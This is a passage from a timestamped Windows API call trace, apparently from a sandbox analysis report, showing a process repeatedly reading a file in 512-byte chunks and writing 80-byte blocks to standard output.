_get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.026] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.026] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, 
lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.027] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.028] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, 
lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.029] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.029] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 
[0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.030] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.030] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: 
lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.031] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.031] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 
[0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.032] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.032] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.033] GetFileType (hFile=0x50) returned 0x1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, 